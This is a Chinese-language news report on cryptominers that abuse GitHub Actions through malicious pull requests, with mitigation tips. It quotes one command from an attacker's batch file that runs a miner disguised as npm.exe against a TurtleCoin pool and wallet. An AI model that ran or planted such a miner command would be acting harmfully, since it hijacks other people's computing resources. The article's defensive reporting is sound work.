网络安全检测|网络安全服务|网络安全扫描-香港墨客投资移动版

这些攻击者仅一次攻击就可以运行多达100个挖矿程序，从而给GitHub的服务器带来了巨大的计算量。

据Aqua估计，仅在三天的时间里，挖矿黑客就在GitHub上有超过2.33万次commit、在Docker Hub上5.8万次build，转化了大约3万个挖矿任务。

这种攻击甚至不需要被攻击的仓库管理者接受恶意Pull Request。

只要在.github/workflows目录里面的任意.yml文件中配置了在收到Pull Request时执行，来自黑客的Action就会自动被执行。

如果你没有使用这个功能，那就不用担心啦，黑客大概也不会找上你。

需要用到这个功能的话，可以设置成只允许本地Action或只允许Github官方及特定作者创建的Action。

将情况反馈给客服后，GitHub会对恶意账号进行封号和关闭相关Pull Request的操作。

但恶意攻击很难被根除，黑客只需要注册新的账号就可以继续白嫖服务器资源。

我们从最近一次攻击中发现，黑客将挖矿程序上传到GitLab并伪装成包管理工具npm。

打开这个可疑的nani.bat，可以看到：

npm.exe --algorithm argon2id_chukwa2 --pool turtlecoin.herominers.com:10380 --wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP --password xo

这一次黑客挖的是乌龟币*(TurtleCoin)*,可使用CPU计算。按当前价格挖出四千多个币才值1美元。

Github Actions的免费服务器可以提供英特尔E5 2673v4的两个核心，7GB内存。

大致估算单台运行一天只能获利几美分，而且黑客的挖矿程序通常只能在被发现之前运行几个小时。比如Docker Hub就把自动build的运行时间限制在2个小时。

不过蚊子再小也是肉，黑客通过寻找更多接受公开Action的仓库以及反复打开关闭Pull Request就能执行更多的挖矿程序。

正如Twitter用户Dave Walker所说的，如果你提供免费的计算资源，就要做好会被攻击和滥用的觉悟。挖矿有利可图的情况下这是不可避免的。

据报道，受害的不止GitHub，还有Docker Hub、Travis CI以及Circle CI等提供类似服务的持续集成平台。

这一乱象不知何时才能结束，唯一的好消息可能就是，挖矿的黑客似乎只是针对GitHub提供的服务器资源，而不会破坏你的代码。

但是GitHub Action的漏洞不止这一个。还有方法能使黑客读写开发者的仓库，甚至可以读取加密的机密文件。

去年7月，Google Project Zero团队就已向GitHub通报漏洞。但在给出的90天修复期限 延长14天后，GitHub仍未能有效解决。

对此，我们的建议是，不要轻易相信GitHub市场里的Action作者，不要交出你的密匙。